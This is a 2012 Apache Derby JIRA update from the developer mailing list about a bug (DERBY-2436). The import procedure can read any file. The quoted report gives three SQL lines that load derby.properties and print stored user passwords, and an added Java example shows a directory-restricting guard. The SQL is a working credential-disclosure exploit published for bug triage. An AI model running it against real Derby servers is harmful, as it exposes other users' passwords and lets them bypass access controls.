Posted to derby-dev@db.apache.org by "Kathey Marsden (JIRA)" <ji...@apache.org> on 2012/09/26 22:01:09 UTC

[jira] [Updated] (DERBY-2436) SYSCS_IMPORT_TABLE can be used to read derby files

     [ https://issues.apache.org/jira/browse/DERBY-2436?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Kathey Marsden updated DERBY-2436:
----------------------------------

    Issue & fix info:   (was: High Value Fix)
              Labels: derby_triage10_10 derby_triage10_5_2  (was: derby_triage10_5_2)

Taking off the High Value Fix list.  A good way to fix this without compatibility issues has not presented itself.
                
> SYSCS_IMPORT_TABLE can be used to read derby files
> --------------------------------------------------
>
>                 Key: DERBY-2436
>                 URL: https://issues.apache.org/jira/browse/DERBY-2436
>             Project: Derby
>          Issue Type: Bug
>          Components: Tools
>    Affects Versions: 10.1.2.1, 10.2.1.6, 10.3.1.4
>            Reporter: Daniel John Debrunner
>            Priority: Critical
>              Labels: derby_triage10_10, derby_triage10_5_2
>
> There are no controls over which files SYSCS_IMPORT_TABLE can read, thus allowing any user that has permission to execute the procedure to try and access information that they have no permission to access. E.g. even with the secure-by-default network server I can execute three lines of SQL to view the contents of derby.properties, thus seeing passwords of other users, or the address of the LDAP server.
> create table t (c varchar(32000));
> CALL SYSCS_UTIL.SYSCS_IMPORT_TABLE(NULL, 'T', 'derby.properties', NULL, NULL, 'ISO8859_1', 0);
> ij> select * from T;
> C
> ----------------------------------------------
> derby.connection.requireAuthentication=true
> derby.authentication.provider=BUILTIN
> derby.user.SA=sapwd
> derby.user.MARY=marypwd
> Also a similar trick could be attempted against the actual data files, allowing a user to attempt to bypass grant/revoke security, especially now that binary data can be exported/imported.

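The report says nothing restricts which files SYSCS_IMPORT_TABLE may read. One shape such a control could take, as an added example that is not Derby code and not a fix proposed in the issue: resolve the requested name against a dedicated import directory and reject anything that lands elsewhere. The class name ImportPathGuard, the directory layout and the sample files are assumptions constructed for illustration.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;

/** Hypothetical guard (not Derby code): limits which files an import call may read. */
public final class ImportPathGuard {
    private final Path importRoot; // the only directory imports may read from

    public ImportPathGuard(Path importRoot, Path systemHome) throws IOException {
        this.importRoot = importRoot.toRealPath();
        Path home = systemHome.toRealPath(); // holds derby.properties and the databases
        // Refuse a layout where the import area and the system home overlap.
        if (this.importRoot.startsWith(home) || home.startsWith(this.importRoot)) {
            throw new IllegalArgumentException("import root overlaps system home");
        }
    }

    /** Returns the resolved file, or throws SecurityException if it is out of bounds. */
    public Path check(String requested) throws IOException {
        // Relative names resolve against the import root, not the JVM working directory.
        // toRealPath() follows symlinks and collapses "..", so only the result is compared.
        Path real = importRoot.resolve(requested).toRealPath();
        if (!real.startsWith(importRoot) || !Files.isRegularFile(real)) {
            throw new SecurityException("import file not permitted: " + requested);
        }
        return real;
    }

    public static void main(String[] args) throws IOException {
        // Constructed layout: <tmp>/home is the system home, <tmp>/imports the import area.
        Path base = Files.createTempDirectory("guard-demo");
        Path home = Files.createDirectory(base.resolve("home"));
        Path imports = Files.createDirectory(base.resolve("imports"));
        Files.write(home.resolve("derby.properties"), "derby.user.SA=placeholder\n".getBytes());
        Files.write(imports.resolve("rows.csv"), "1,2,3\n".getBytes());

        ImportPathGuard guard = new ImportPathGuard(imports, home);
        System.out.println("allowed: " + guard.check("rows.csv").getFileName());
        String[] outside = {"../home/derby.properties", home.resolve("derby.properties").toString()};
        for (String name : outside) {
            try {
                guard.check(name);
                System.out.println("NOT BLOCKED: " + name);
            } catch (SecurityException e) {
                System.out.println("blocked: " + name);
            }
        }
    }
}
```

A check of this kind changes behaviour for existing callers that pass arbitrary file paths to the import procedure.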